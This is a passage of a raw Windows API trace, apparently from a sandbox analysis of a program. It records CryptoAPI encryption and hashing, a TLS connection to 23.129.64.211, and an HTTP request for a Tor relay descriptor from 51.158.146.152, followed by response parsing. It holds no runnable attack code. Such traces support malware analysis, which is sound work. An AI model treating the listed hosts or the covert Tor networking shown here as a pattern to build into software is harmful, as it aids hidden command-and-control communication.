dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.336] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.336] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.336] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.336] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.336] malloc (_Size=0x1fd) returned 0x3def010 [0152.336] free (_Block=0x0) [0152.336] free (_Block=0x3df00e0) [0152.336] malloc (_Size=0x1fd) returned 0x3df00e0 [0152.336] free (_Block=0x0) [0152.336] CryptDuplicateHash (in: hHash=0x4329b8, pdwReserved=0x0, dwFlags=0x0, phHash=0x37dfb14 | out: phHash=0x37dfb14) returned 1 [0152.336] CryptHashData (hHash=0x3e0ed8, pbData=0x3df00e0, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0152.336] malloc (_Size=0x14) returned 0x3f65440 [0152.337] free (_Block=0x0) [0152.337] CryptGetHashParam (in: hHash=0x3e0ed8, dwParam=0x2, pbData=0x3f65440, pdwDataLen=0x37dfacc, dwFlags=0x0 | out: pbData=0x3f65440, pdwDataLen=0x37dfacc) returned 1 [0152.337] CryptHashData (hHash=0x4329b8, pbData=0x3df00e0, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0152.337] free (_Block=0x3f65440) [0152.337] CryptDestroyHash (hHash=0x3e0ed8) returned 1 [0152.337] free (_Block=0x3df00e0) [0152.337] free (_Block=0x3691270) [0152.337] malloc (_Size=0x1fd) returned 0x3691270 [0152.337] free (_Block=0x0) [0152.337] malloc (_Size=0x1) returned 0x3f4bfc8 [0152.337] free (_Block=0x0) [0152.337] malloc (_Size=0x1) returned 0x3f4c0c8 [0152.337] free (_Block=0x0) [0152.337] free (_Block=0x0) [0152.337] free (_Block=0x3f4bfc8) [0152.337] SetEvent (hEvent=0x5c8) returned 1 [0152.337] SetEvent (hEvent=0x5cc) returned 1 [0152.337] free (_Block=0x3f4c0c8) [0152.337] free (_Block=0x3691270) [0152.337] free (_Block=0x3def010) [0152.337] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x80090318 [0152.337] recv (in: s=0x5b0, buf=0x3de7008, len=16413, flags=0 | out: buf=0x3de7008) returned -1 [0152.395] free (_Block=0x0) Thread: id = 167 os_tid = 0x1088 [0154.067] GetLastError () returned 0x0 [0154.067] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x364) returned 0x4165d0 [0154.067] SetLastError (dwErrCode=0x0) [0154.067] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1000) returned 0x3f6f08 [0154.068] malloc (_Size=0x8) returned 0x3f4c0c8 [0154.068] free (_Block=0x0) [0154.068] malloc (_Size=0x8) returned 0x3f4c008 [0154.068] free (_Block=0x0) [0154.068] malloc (_Size=0x10) returned 0x3648e18 [0154.068] free (_Block=0x0) [0154.068] malloc (_Size=0x10) returned 0x3648de8 [0154.069] free (_Block=0x0) [0154.069] malloc (_Size=0x50) returned 0x3d9aa38 [0154.069] free (_Block=0x3648de8) [0154.069] malloc (_Size=0x150) returned 0x3d80d60 [0154.069] free (_Block=0x3d9aa38) [0154.069] malloc (_Size=0x550) returned 0x3f68010 [0154.069] free (_Block=0x3d80d60) [0154.069] malloc (_Size=0x1550) returned 0x36929c0 [0154.070] free (_Block=0x3f68010) [0154.071] malloc (_Size=0x5550) returned 0x3689268 [0154.071] free (_Block=0x36929c0) [0154.073] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x4, pbBuffer=0x316f62c | out: pbBuffer=0x316f62c) returned 1 [0154.073] free (_Block=0x3689268) [0154.073] free (_Block=0x3648e18) [0154.074] free (_Block=0x3f4c008) [0154.074] free (_Block=0x0) [0154.074] SetEvent (hEvent=0x558) returned 1 [0154.074] malloc (_Size=0xc8) returned 0x3594d18 [0154.074] inet_ntoa (in=0xd3408117) returned="23.129.64.211" [0154.074] malloc (_Size=0xe) returned 0x3648d88 [0154.074] free (_Block=0x0) [0154.074] malloc (_Size=0x8000) returned 0x3689268 [0154.074] malloc (_Size=0x8000) returned 0x3de7008 [0154.074] malloc (_Size=0xe) returned 0x3648e48 [0154.074] free (_Block=0x0) [0154.074] free (_Block=0x0) [0154.074] AcquireCredentialsHandleA (in: pszPrincipal=0x0, pszPackage="Microsoft Unified Security Protocol Provider", fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x316f530, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x3594d44, ptsExpiry=0x0 | out: phCredential=0x3594d44, ptsExpiry=0x0) returned 0x0 [0154.076] gethostbyname (name="23.129.64.211") returned 0x42bec8*(h_name="23.129.64.211", h_aliases=0x42bed8*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x42bedc*=([0]="23.129.64.211")) [0154.078] htons (hostshort=0x1bb) returned 0xbb01 [0154.078] socket (af=2, type=1, protocol=6) returned 0x5c8 [0154.079] connect (s=0x5c8, name=0x316f588*(sa_family=2, sin_port=0x1bb, sin_addr="23.129.64.211"), namelen=16) returned 0 [0154.288] InitializeSecurityContextA (in: phCredential=0x3594d44, phContext=0x0, pszTargetName=0x3648e48, fContextReq=0xc11c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x3594d4c, pOutput=0x3594dac, pfContextAttr=0x3594dbc, ptsExpiry=0x0 | out: phNewContext=0x3594d4c, pOutput=0x3594dac, pfContextAttr=0x3594dbc, ptsExpiry=0x0) returned 0x90312 [0154.313] send (s=0x5c8, buf=0x3eec70*, len=151, flags=0) returned 151 [0154.314] FreeContextBuffer (in: pvContextBuffer=0x3eec70 | out: pvContextBuffer=0x3eec70) returned 0x0 [0154.314] recv (in: s=0x5c8, buf=0x3689268, len=32768, flags=0 | out: buf=0x3689268*) returned 1010 [0154.480] InitializeSecurityContextA (in: phCredential=0x3594d44, phContext=0x3594d4c, pszTargetName=0x3648e48, fContextReq=0xc11c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x3594da0, Reserved2=0x0, phNewContext=0x3594d4c, pOutput=0x3594dac, pfContextAttr=0x3594dbc, ptsExpiry=0x0 | out: phNewContext=0x3594d4c, pOutput=0x3594dac, pfContextAttr=0x3594dbc, ptsExpiry=0x0) returned 0x90312 [0154.687] send (s=0x5c8, buf=0x42a560*, len=126, flags=0) returned 126 [0154.688] FreeContextBuffer (in: pvContextBuffer=0x42a560 | out: pvContextBuffer=0x42a560) returned 0x0 [0154.688] recv (in: s=0x5c8, buf=0x3689268, len=32768, flags=0 | out: buf=0x3689268*) returned 51 [0154.890] InitializeSecurityContextA (in: phCredential=0x3594d44, phContext=0x3594d4c, pszTargetName=0x3648e48, fContextReq=0xc11c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x3594da0, Reserved2=0x0, phNewContext=0x3594d4c, pOutput=0x3594dac, pfContextAttr=0x3594dbc, ptsExpiry=0x0 | out: phNewContext=0x3594d4c, pOutput=0x3594dac, pfContextAttr=0x3594dbc, ptsExpiry=0x0) returned 0x0 [0154.891] QueryContextAttributesA (in: phContext=0x3594d4c, ulAttribute=0x4, pBuffer=0x3594d68 | out: pBuffer=0x3594d68) returned 0x0 [0154.891] free (_Block=0x3648d88) [0154.891] SetEvent (hEvent=0x558) returned 1 [0154.891] malloc (_Size=0x2) returned 0x3f4bf68 [0154.891] free (_Block=0x0) [0154.891] malloc (_Size=0x7) returned 0x3f4bf98 [0154.891] free (_Block=0x0) [0154.892] EncryptMessage (in: phContext=0x3594d4c, fQOP=0x0, pMessage=0x316f53c, MessageSeqNo=0x0 | out: pMessage=0x316f53c) returned 0x0 [0154.892] send (s=0x5c8, buf=0x3de7008*, len=36, flags=0) returned 36 [0154.892] free (_Block=0x3f4bf98) [0154.892] free (_Block=0x3f4bf68) [0154.892] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x316f514, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x316f514, pfQOP=0x0) returned 0x80090318 [0154.892] recv (in: s=0x5c8, buf=0x3689268, len=16413, flags=0 | out: buf=0x3689268*) returned 2054 [0155.048] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x316f514, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x316f514, pfQOP=0x0) returned 0x0 [0155.049] malloc (_Size=0x6) returned 0x3f4c028 [0155.049] free (_Block=0x0) [0155.049] malloc (_Size=0x6) returned 0x3f4c0b8 [0155.049] free (_Block=0x0) [0155.049] free (_Block=0x0) [0155.049] free (_Block=0x3f4c028) [0155.049] free (_Block=0x3f4c0b8) [0155.050] malloc (_Size=0x5a8) returned 0x3691270 [0155.050] free (_Block=0x0) [0155.050] malloc (_Size=0x5a8) returned 0x3def010 [0155.050] free (_Block=0x0) [0155.050] free (_Block=0x0) [0155.050] free (_Block=0x3691270) [0155.050] free (_Block=0x3def010) [0155.050] malloc (_Size=0x26) returned 0x60dd08 [0155.050] free (_Block=0x0) [0155.050] malloc (_Size=0x26) returned 0x60dd98 [0155.050] free (_Block=0x0) [0155.051] free (_Block=0x0) [0155.051] free (_Block=0x60dd08) [0155.051] free (_Block=0x60dd98) [0155.051] malloc (_Size=0x1fd) returned 0x369ed88 [0155.051] free (_Block=0x0) [0155.051] malloc (_Size=0x1fd) returned 0x3d81e60 [0155.051] free (_Block=0x0) [0155.051] free (_Block=0x0) [0155.051] free (_Block=0x369ed88) [0155.051] free (_Block=0x3d81e60) [0155.051] time (in: timer=0x0 | out: timer=0x0) returned 0x5f9969d5 [0155.051] malloc (_Size=0x11) returned 0x3f65280 [0155.051] free (_Block=0x0) [0155.052] malloc (_Size=0x11) returned 0x3f65440 [0155.052] free (_Block=0x0) [0155.052] malloc (_Size=0x202) returned 0x369ed88 [0155.052] free (_Block=0x0) [0155.052] EncryptMessage (in: phContext=0x3594d4c, fQOP=0x0, pMessage=0x316f4ec, MessageSeqNo=0x0 | out: pMessage=0x316f4ec) returned 0x0 [0155.052] send (s=0x5c8, buf=0x3de7008*, len=543, flags=0) returned 543 [0155.053] free (_Block=0x369ed88) [0155.053] free (_Block=0x3f65440) [0155.053] free (_Block=0x3f65280) [0155.053] malloc (_Size=0x20) returned 0x3d803a0 [0155.053] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x74193cae, lpParameter=0x3d803a0, dwCreationFlags=0x0, lpThreadId=0x3d803a8 | out: lpThreadId=0x3d803a8*=0x1354) returned 0x5cc [0155.054] GetTickCount () returned 0x116798d [0155.054] malloc (_Size=0x10) returned 0x3648d70 [0155.054] free (_Block=0x0) [0155.054] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648d70*=0x558, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0155.054] free (_Block=0x3648d70) [0155.054] GetTickCount () returned 0x116798d [0155.054] malloc (_Size=0x10) returned 0x3648ec0 [0155.054] free (_Block=0x0) [0155.054] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648ec0*=0x558, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0155.158] free (_Block=0x3648ec0) [0155.158] GetTickCount () returned 0x11679fa [0155.159] malloc (_Size=0x50) returned 0x3d9ada8 [0155.159] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a4 [0155.159] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a8 [0155.159] SetEvent (hEvent=0x3a4) returned 1 [0155.159] malloc (_Size=0x34) returned 0x36245f0 [0155.159] malloc (_Size=0x338) returned 0x3624c18 [0155.159] malloc (_Size=0x80) returned 0x609940 [0155.159] free (_Block=0x0) [0155.159] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x80, pbBuffer=0x609940 | out: pbBuffer=0x609940) returned 1 [0155.159] CryptImportKey (in: hProv=0x3e57b0, pbData=0x316f238, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x316f234 | out: phKey=0x316f234*=0x3e1058) returned 1 [0155.165] CryptExportKey (in: hKey=0x3e1058, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x316ee94, pdwDataLen=0x316ee7c | out: pbData=0x316ee94*, pdwDataLen=0x316ee7c*=0x90) returned 1 [0155.165] free (_Block=0x609940) [0155.165] CryptBinaryToStringA (in: pbBinary=0x3e2ca08, cbBinary=0x14, dwFlags=0x4000000c, pszString=0x0, pcchString=0x316f53c | out: pszString=0x0, pcchString=0x316f53c) returned 1 [0155.165] malloc (_Size=0x29) returned 0x3624b48 [0155.166] free (_Block=0x0) [0155.166] CryptBinaryToStringA (in: pbBinary=0x3e2ca08, cbBinary=0x14, dwFlags=0x4000000c, pszString=0x3624b48, pcchString=0x316f53c | out: pszString="812d17f974f2ccd7aae585a879783c2ef96687de", pcchString=0x316f53c) returned 1 [0155.166] malloc (_Size=0x10) returned 0x3648db8 [0155.166] free (_Block=0x0) [0155.166] malloc (_Size=0x10) returned 0x3648e00 [0155.166] free (_Block=0x0) [0155.166] malloc (_Size=0x38) returned 0x3624670 [0155.166] free (_Block=0x3648e00) [0155.166] malloc (_Size=0x8) returned 0x3f4bf58 [0155.166] free (_Block=0x0) [0155.166] malloc (_Size=0x10) returned 0x3648da0 [0155.166] free (_Block=0x0) [0155.166] malloc (_Size=0x50) returned 0x3d9a9e0 [0155.166] free (_Block=0x3648da0) [0155.166] malloc (_Size=0x150) returned 0x3d806a8 [0155.167] free (_Block=0x3d9a9e0) [0155.167] malloc (_Size=0x550) returned 0x3691270 [0155.167] free (_Block=0x3d806a8) [0155.167] malloc (_Size=0x1550) returned 0x36929c0 [0155.167] free (_Block=0x3691270) [0155.167] malloc (_Size=0x5550) returned 0x348c1b8 [0155.167] free (_Block=0x36929c0) [0155.167] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x4, pbBuffer=0x316f464 | out: pbBuffer=0x316f464) returned 1 [0155.167] free (_Block=0x348c1b8) [0155.168] free (_Block=0x0) [0155.168] free (_Block=0x0) [0155.168] free (_Block=0x3f4bf58) [0155.168] inet_ntoa (in=0x98929e33) returned="51.158.146.152" [0155.168] malloc (_Size=0xf) returned 0x3648c80 [0155.168] free (_Block=0x0) [0155.168] gethostbyname (name="51.158.146.152") returned 0x42bbb8*(h_name="51.158.146.152", h_aliases=0x42bbc8*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x42bbcc*=([0]="51.158.146.152")) [0155.169] htons (hostshort=0x50) returned 0x5000 [0155.169] socket (af=2, type=1, protocol=6) returned 0x380 [0155.169] connect (s=0x380, name=0x316f440*(sa_family=2, sin_port=0x50, sin_addr="51.158.146.152"), namelen=16) returned 0 [0155.203] _vscprintf (_Format="GET %s HTTP/1.0\r\nHost: %s\r\n\r\n", _ArgList=0x316f408) returned 94 [0155.203] malloc (_Size=0x5f) returned 0x60e080 [0155.203] free (_Block=0x0) [0155.203] vsprintf_s (in: _DstBuf=0x60e080, _SizeInBytes=0x5f, _Format="GET %s HTTP/1.0\r\nHost: %s\r\n\r\n", _ArgList=0x316f408 | out: _DstBuf="GET /tor/server/fp/812d17f974f2ccd7aae585a879783c2ef96687de HTTP/1.0\r\nHost: 51.158.146.152\r\n\r\n") returned 94 [0155.204] send (s=0x380, buf=0x60e080*, len=95, flags=0) returned 95 [0155.204] recv (in: s=0x380, buf=0x316e404, len=4096, flags=0 | out: buf=0x316e404*) returned 3460 [0155.237] malloc (_Size=0xd85) returned 0x60cdc0 [0155.238] free (_Block=0x0) [0155.238] recv (in: s=0x380, buf=0x316e404, len=4096, flags=0 | out: buf=0x316e404*) returned 764 [0155.238] malloc (_Size=0x1447) returned 0x36929c0 [0155.238] free (_Block=0x60cdc0) [0155.238] recv (in: s=0x380, buf=0x316e404, len=4096, flags=0 | out: buf=0x316e404) returned 0 [0155.238] closesocket (s=0x380) returned 0 [0155.239] malloc (_Size=0xfca) returned 0x3f69ce0 [0155.239] free (_Block=0x0) [0155.239] free (_Block=0x36929c0) [0155.239] free (_Block=0x60e080) [0155.239] closesocket (s=0xffffffff) returned -1 [0155.239] free (_Block=0x0) [0155.239] free (_Block=0x3648c80) [0155.239] free (_Block=0x0) [0155.239] free (_Block=0x3624670) [0155.239] free (_Block=0x3648db8) [0155.239] free (_Block=0x3624b48) [0155.239] malloc (_Size=0xfca) returned 0x36929c0 [0155.239] free (_Block=0x0) [0155.239] memchr (_Buf=0x36929c0, _Val=10, _MaxCount=0xfc9) returned 0x36929e4 [0155.239] malloc (_Size=0x25) returned 0x60dd68 [0155.239] free (_Block=0x0) [0155.240] malloc (_Size=0x40) returned 0x3e221e8 [0155.240] free (_Block=0x0) [0155.240] free (_Block=0x0) [0155.240] memchr (_Buf=0x36929e5, _Val=10, _MaxCount=0xfa4) returned 0x36929f5 [0155.240] malloc (_Size=0x11) returned 0x3f65440 [0155.240] free (_Block=0x0) [0155.240] free (_Block=0x0) [0155.240] memchr (_Buf=0x36929f6, _Val=10, _MaxCount=0xf93) returned 0x3692a12 [0155.240] malloc (_Size=0x1d) returned 0x3d803c8 [0155.240] free (_Block=0x0) [0155.240] free (_Block=0x0) [0155.240] memchr (_Buf=0x3692a13, _Val=10, _MaxCount=0xf76) returned 0x3692a53 [0155.240] malloc (_Size=0x41) returned 0x60edc8 [0155.240] free (_Block=0x0) [0155.240] free (_Block=0x0) [0155.240] memchr (_Buf=0x3692a54, _Val=10, _MaxCount=0xf35) returned 0x3692a94 [0155.240] malloc (_Size=0x41) returned 0x60ee18 [0155.240] free (_Block=0x0) [0155.240] malloc (_Size=0x140) returned 0x3dd4790 [0155.240] free (_Block=0x3e221e8) [0155.241] free (_Block=0x0) [0155.241] memchr (_Buf=0x3692a95, _Val=10, _MaxCount=0xef4) returned 0x3692ad1 [0155.241] malloc (_Size=0x3d) returned 0x3e226b0 [0155.241] free (_Block=0x0) [0155.241] free (_Block=0x0) [0155.241] memchr (_Buf=0x3692ad2, _Val=10, _MaxCount=0xeb7) returned 0x3692aec [0155.241] malloc (_Size=0x1b) returned 0x3d80120 [0155.241] free (_Block=0x0) [0155.241] free (_Block=0x0) [0155.241] memchr (_Buf=0x3692aed, _Val=10, _MaxCount=0xe9c) returned 0x3692b2b [0155.241] malloc (_Size=0x3f) returned 0x3e22470 [0155.241] free (_Block=0x0) [0155.241] free (_Block=0x0) [0155.241] memchr (_Buf=0x3692b2c, _Val=10, _MaxCount=0xe5d) returned 0x3692b4a [0155.241] malloc (_Size=0x1f) returned 0x3d80080 [0155.241] free (_Block=0x0) [0155.241] free (_Block=0x0) [0155.241] memchr (_Buf=0x3692b4b, _Val=10, _MaxCount=0xe3e) returned 0x3692b6a [0155.241] malloc (_Size=0x20) returned 0x3d802b0 [0155.242] free (_Block=0x0) [0155.242] free (_Block=0x0) [0155.242] memchr (_Buf=0x3692b6b, _Val=10, _MaxCount=0xe1e) returned 0x3692bf3 [0155.242] malloc (_Size=0x89) returned 0x6066d8 [0155.242] free (_Block=0x0) [0155.242] free (_Block=0x0) [0155.242] memchr (_Buf=0x3692bf4, _Val=10, _MaxCount=0xd95) returned 0x3692c11 [0155.242] malloc (_Size=0x1e) returned 0x3d80350 [0155.242] free (_Block=0x0) [0155.242] free (_Block=0x0) [0155.242] memchr (_Buf=0x3692c12, _Val=10, _MaxCount=0xd77) returned 0x3692c4f [0155.242] malloc (_Size=0x3e) returned 0x3e223e0 [0155.242] free (_Block=0x0) [0155.242] free (_Block=0x0) [0155.242] memchr (_Buf=0x3692c50, _Val=10, _MaxCount=0xd39) returned 0x3692c5e [0155.242] malloc (_Size=0xf) returned 0x3648e30 [0155.242] free (_Block=0x0) [0155.242] free (_Block=0x0) [0155.242] memchr (_Buf=0x3692c5f, _Val=10, _MaxCount=0xd2a) returned 0x3692c86 [0155.242] malloc (_Size=0x28) returned 0x60ddf8 [0155.243] free (_Block=0x0) [0155.243] free (_Block=0x0) [0155.243] memchr (_Buf=0x3692c87, _Val=10, _MaxCount=0xd02) returned 0x3692ced [0155.243] malloc (_Size=0x67) returned 0x60b380 [0155.243] free (_Block=0x0) [0155.243] free (_Block=0x0) [0155.243] memchr (_Buf=0x3692cee, _Val=10, _MaxCount=0xc9b) returned 0x3692cf7 [0155.243] malloc (_Size=0xa) returned 0x3648c68 [0155.243] free (_Block=0x0) [0155.243] free (_Block=0x0) [0155.243] memchr (_Buf=0x3692cf8, _Val=10, _MaxCount=0xc91) returned 0x3692d16 [0155.243] malloc (_Size=0x1f) returned 0x3d801e8 [0155.243] free (_Block=0x0) [0155.243] free (_Block=0x0) [0155.243] memchr (_Buf=0x3692d17, _Val=10, _MaxCount=0xc72) returned 0x3692d57 [0155.243] malloc (_Size=0x41) returned 0x60ebe8 [0155.243] free (_Block=0x0) [0155.243] free (_Block=0x0) [0155.243] memchr (_Buf=0x3692d58, _Val=10, _MaxCount=0xc31) returned 0x3692d98 [0155.243] malloc (_Size=0x41) returned 0x60ec38 [0155.244] free (_Block=0x0) [0155.244] free (_Block=0x0) [0155.244] memchr (_Buf=0x3692d99, _Val=10, _MaxCount=0xbf0) returned 0x3692dd5 [0155.244] malloc (_Size=0x3d) returned 0x3e22080 [0155.244] free (_Block=0x0) [0155.244] malloc (_Size=0x540) returned 0x3691270 [0155.244] free (_Block=0x3dd4790) [0155.244] free (_Block=0x0) [0155.244] memchr (_Buf=0x3692dd6, _Val=10, _MaxCount=0xbb3) returned 0x3692df2 [0155.244] malloc (_Size=0x1d) returned 0x3d80238 [0155.244] free (_Block=0x0) [0155.244] free (_Block=0x0) [0155.244] memchr (_Buf=0x3692df3, _Val=10, _MaxCount=0xb96) returned 0x3692dfe [0155.244] malloc (_Size=0xc) returned 0x3648ef0 [0155.244] free (_Block=0x0) [0155.244] free (_Block=0x0) [0155.244] memchr (_Buf=0x3692dff, _Val=10, _MaxCount=0xb8a) returned 0x3692e1d [0155.244] malloc (_Size=0x1f) returned 0x3d80198 [0155.244] free (_Block=0x0) [0155.245] free (_Block=0x0) [0155.245] memchr (_Buf=0x3692e1e, _Val=10, _MaxCount=0xb6b) returned 0x3692e5e [0155.245] malloc (_Size=0x41) returned 0x60eb98 [0155.245] free (_Block=0x0) [0155.245] free (_Block=0x0) [0155.245] memchr (_Buf=0x3692e5f, _Val=10, _MaxCount=0xb2a) returned 0x3692e9f [0155.245] malloc (_Size=0x41) returned 0x60e968 [0155.245] free (_Block=0x0) [0155.245] free (_Block=0x0) [0155.245] memchr (_Buf=0x3692ea0, _Val=10, _MaxCount=0xae9) returned 0x3692edc [0155.245] malloc (_Size=0x3d) returned 0x3e22230 [0155.246] free (_Block=0x0) [0155.246] free (_Block=0x0) [0155.246] memchr (_Buf=0x3692edd, _Val=10, _MaxCount=0xaac) returned 0x3692ef9 [0155.246] malloc (_Size=0x1d) returned 0x3d800d0 [0155.246] free (_Block=0x0) [0155.246] free (_Block=0x0) [0155.246] memchr (_Buf=0x3692efa, _Val=10, _MaxCount=0xa8f) returned 0x3692f0d [0155.246] malloc (_Size=0x14) returned 0x3f65460 [0155.246] free (_Block=0x0) [0155.246] free (_Block=0x0) [0155.246] memchr (_Buf=0x3692f0e, _Val=10, _MaxCount=0xa7b) returned 0x3692f27 [0155.246] malloc (_Size=0x1a) returned 0x3d800a8 [0155.246] free (_Block=0x0) [0155.247] free (_Block=0x0) [0155.247] memchr (_Buf=0x3692f28, _Val=10, _MaxCount=0xa61) returned 0x3692f68 [0155.247] malloc (_Size=0x41) returned 0x60ec88 [0155.247] free (_Block=0x0) [0155.247] free (_Block=0x0) [0155.247] memchr (_Buf=0x3692f69, _Val=10, _MaxCount=0xa20) returned 0x3692fa9 [0155.247] malloc (_Size=0x41) returned 0x60e9b8 [0155.247] free (_Block=0x0) [0155.247] free (_Block=0x0) [0155.248] memchr (_Buf=0x3692faa, _Val=10, _MaxCount=0x9df) returned 0x3692fd6 [0155.248] malloc (_Size=0x2d) returned 0x3624b80 [0155.248] free (_Block=0x0) [0155.248] free (_Block=0x0) [0155.248] memchr (_Buf=0x3692fd7, _Val=10, _MaxCount=0x9b2) returned 0x3692fee [0155.248] malloc (_Size=0x18) returned 0x3f65480 [0155.249] free (_Block=0x0) [0155.249] free (_Block=0x0) [0155.249] memchr (_Buf=0x3692fef, _Val=10, _MaxCount=0x99a) returned 0x3693009 [0155.249] malloc (_Size=0x1b) returned 0x3d802d8 [0155.249] free (_Block=0x0) [0155.249] free (_Block=0x0) [0155.249] memchr (_Buf=0x369300a, _Val=10, _MaxCount=0x97f) returned 0x3693026 [0155.249] malloc (_Size=0x1d) returned 0x3d80148 [0155.249] free (_Block=0x0) [0155.249] free (_Block=0x0) [0155.249] memchr (_Buf=0x3693027, _Val=10, _MaxCount=0x962) returned 0x3693067 [0155.249] malloc (_Size=0x41) returned 0x60eaa8 [0155.249] free (_Block=0x0) [0155.249] free (_Block=0x0) [0155.249] memchr (_Buf=0x3693068, _Val=10, _MaxCount=0x921) returned 0x36930a8 [0155.249] malloc (_Size=0x41) returned 0x60e878 [0155.250] free (_Block=0x0) [0155.250] free (_Block=0x0) [0155.250] memchr (_Buf=0x36930a9, _Val=10, _MaxCount=0x8e0) returned 0x36930b5 [0155.250] malloc (_Size=0xd) returned 0x3648f08 [0155.250] free (_Block=0x0) [0155.250] free (_Block=0x0) [0155.250] memchr (_Buf=0x36930b6, _Val=10, _MaxCount=0x8d3) returned 0x36930d0 [0155.250] malloc (_Size=0x1b) returned 0x3d80288 [0155.250] free (_Block=0x0) [0155.250] free (_Block=0x0) [0155.250] memchr (_Buf=0x36930d1, _Val=10, _MaxCount=0x8b8) returned 0x36936e9 [0155.250] malloc (_Size=0x619) returned 0x3def010 [0155.250] free (_Block=0x0) [0155.250] free (_Block=0x0) [0155.250] memchr (_Buf=0x36936ea, _Val=10, _MaxCount=0x29f) returned 0x36936fc [0155.250] malloc (_Size=0x13) returned 0x3f65280 [0155.250] free (_Block=0x0) [0155.250] free (_Block=0x0) [0155.250] memchr (_Buf=0x36936fd, _Val=10, _MaxCount=0x28c) returned 0x369371a [0155.250] malloc (_Size=0x1e) returned 0x3d803f0 [0155.250] free (_Block=0x0) [0155.251] free (_Block=0x0) [0155.251] memchr (_Buf=0x369371b, _Val=10, _MaxCount=0x26e) returned 0x3693756 [0155.251] malloc (_Size=0x3c) returned 0x3e220c8 [0155.251] free (_Block=0x0) [0155.251] free (_Block=0x0) [0155.251] memchr (_Buf=0x3693757, _Val=10, _MaxCount=0x232) returned 0x3693769 [0155.251] malloc (_Size=0x13) returned 0x3f652c0 [0155.251] free (_Block=0x0) [0155.251] free (_Block=0x0) [0155.251] memchr (_Buf=0x369376a, _Val=10, _MaxCount=0x21f) returned 0x3693781 [0155.251] malloc (_Size=0x18) returned 0x3f651e0 [0155.251] free (_Block=0x0) [0155.251] free (_Block=0x0) [0155.251] memchr (_Buf=0x3693782, _Val=10, _MaxCount=0x207) returned 0x3693796 [0155.251] malloc (_Size=0x15) returned 0x3f65320 [0155.251] free (_Block=0x0) [0155.251] free (_Block=0x0) [0155.251] memchr (_Buf=0x3693797, _Val=10, _MaxCount=0x1f2) returned 0x36937ae [0155.251] malloc (_Size=0x18) returned 0x3f65300 [0155.251] free (_Block=0x0) [0155.251] free (_Block=0x0) [0155.252] memchr (_Buf=0x36937af, _Val=10, _MaxCount=0x1da) returned 0x36937c2 [0155.252] malloc (_Size=0x14) returned 0x3f65340 [0155.252] free (_Block=0x0) [0155.252] free (_Block=0x0) [0155.252] memchr (_Buf=0x36937c3, _Val=10, _MaxCount=0x1c6) returned 0x36937d9 [0155.252] malloc (_Size=0x17) returned 0x3f65360 [0155.252] free (_Block=0x0) [0155.252] free (_Block=0x0) [0155.252] memchr (_Buf=0x36937da, _Val=10, _MaxCount=0x1af) returned 0x36937f1 [0155.252] malloc (_Size=0x18) returned 0x3f653c0 [0155.252] free (_Block=0x0) [0155.252] free (_Block=0x0) [0155.252] memchr (_Buf=0x36937f2, _Val=10, _MaxCount=0x197) returned 0x36937fc [0155.252] malloc (_Size=0xb) returned 0x3648d40 [0155.252] free (_Block=0x0) [0155.252] free (_Block=0x0) [0155.252] memchr (_Buf=0x36937fd, _Val=10, _MaxCount=0x18c) returned 0x3693817 [0155.252] malloc (_Size=0x1b) returned 0x3d801c0 [0155.252] free (_Block=0x0) [0155.252] free (_Block=0x0) [0155.252] memchr (_Buf=0x3693818, _Val=10, _MaxCount=0x171) returned 0x369382c [0155.252] malloc (_Size=0x15) returned 0x3f65380 [0155.253] free (_Block=0x0) [0155.253] free (_Block=0x0) [0155.253] memchr (_Buf=0x369382d, _Val=10, _MaxCount=0x15c) returned 0x3693896 [0155.253] malloc (_Size=0x6a) returned 0x60bb78 [0155.253] free (_Block=0x0) [0155.253] free (_Block=0x0) [0155.253] memchr (_Buf=0x3693897, 